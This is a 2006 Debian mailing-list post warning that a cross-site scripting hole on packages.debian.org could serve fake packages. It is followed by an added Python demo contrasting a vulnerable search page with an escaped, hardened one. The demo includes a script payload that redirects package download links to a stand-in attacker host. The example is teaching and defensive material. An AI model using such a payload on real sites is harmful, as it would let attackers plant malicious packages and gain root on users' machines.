
Cross-site scripting on packages.debian.org



On Mon, Dec 11, 2006 at 06:51:34PM +0100, Javier Fernández-Sanguino Peña wrote:
> This is not code injection, it's cross-site scripting. Given that:
> 
> - packages.debian.org does not have any kind of client authentication
> - packages.debian.org does not use an SSL certificate
> 
> this is as much a problem as somebody being able to setup a "fake"
> packages.debian.org or do MITM injection.

I beg to differ! This is a very serious problem, as this XSS hole can 
easily be abused to trick people into downloading fake packages, which 
means the attacker gets root on their machines. "I'm certain I downloaded 
this file from packages.d.o, so surely it must be the right one?!"

The only thing they need to do to fall victim to this is to go to 
packages.d.o via a link that the attacker controls. For example, this 
could be done with a fake posting to bugtraq. Someone, please apply 
Javier's patch as soon as possible!!

http://bugs.debian.org/402631

Cheers,

  Richard

-- 
  __   _
  |_) /|  Richard Atterer     |  GnuPG key: 888354F7
  | \/¯|  http://atterer.net  |  08A9 7B7D 3D13 3EF2 3D25  D157 79E6 F6DC 8883 54F7
  ¯ '` ¯
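The attack Richard describes, as an added example that is not part of the original thread and not the code of packages.debian.org: a search page echoes a user-supplied keyword into its HTML, and if it does so without escaping, a link that the attacker posts anywhere (a fake bugtraq mail, a forum) injects script that runs on the trusted site and rewrites the .deb download links the victim sees. The hostnames, the `keyword` parameter, the package list and the page template are all constructed for this illustration; nothing here describes the actual bug #402631.

```python
"""Reflected XSS turned into a fake-package download: vulnerable vs. hardened.

Added example, not from the original message or from packages.debian.org.
All hosts, names and the page template are constructed for illustration.
"""

import html
from urllib.parse import parse_qs, quote, urlparse

# Constructed package index (a real one would come from the archive).
PACKAGES = {
    "hello": "http://mirror.example.org/pool/main/h/hello/hello_2.2-1_i386.deb",
}

# Constructed attacker payload: once it executes inside the trusted origin,
# every download link points at the attacker's .deb while the address bar
# still shows the site the victim trusts.
PAYLOAD = (
    "<script>"
    "for(var a of document.querySelectorAll('a.deb'))"
    "a.href='http://attacker.example/hello_2.2-1_i386.deb';"
    "</script>"
)

# The link the attacker would publish, e.g. in a forged bugtraq posting.
ATTACKER_LINK = "http://packages.example.org/search?keyword=" + quote(PAYLOAD)


def keyword_from_url(url):
    """Extract the 'keyword' query parameter exactly as the server would."""
    return parse_qs(urlparse(url).query).get("keyword", [""])[0]


def render_page(keyword, escape_output):
    """Render the constructed search page.

    escape_output=False reproduces the classic reflected-XSS bug: the
    keyword is inserted into the document verbatim, so markup in it becomes
    live markup. escape_output=True applies HTML entity escaping, which is
    the fix for this class of bug.
    """
    shown = html.escape(keyword, quote=True) if escape_output else keyword
    links = "".join(
        f'<li><a class="deb" href="{html.escape(url, quote=True)}">{name}</a></li>'
        for name, url in PACKAGES.items()
    )
    return f"<h1>Search results for: {shown}</h1><ul>{links}</ul>"


def render_vulnerable(url):
    """The buggy page: reflects the keyword unescaped."""
    return render_page(keyword_from_url(url), escape_output=False)


def render_hardened(url):
    """The fixed page: same output, but the keyword is entity-escaped."""
    return render_page(keyword_from_url(url), escape_output=True)


def injects_script(page):
    """Crude demo check: does a live <script> element appear in the page?

    This is only to make the difference visible; the real defence is the
    escaping in render_page, not post-hoc scanning of the output.
    """
    return "<script>" in page.lower()


if __name__ == "__main__":
    print("attacker link:", ATTACKER_LINK)
    print("vulnerable page:", render_vulnerable(ATTACKER_LINK))
    print("hardened page:  ", render_hardened(ATTACKER_LINK))
```

The hardened page still displays the attacker's text, but as inert `&lt;script&gt;` characters rather than an element the browser executes. Note also why SSL on the server would not have changed anything here: the injected script is delivered by the genuine site over whatever transport it uses, so the certificate would vouch for the attacker's payload along with the rest of the page.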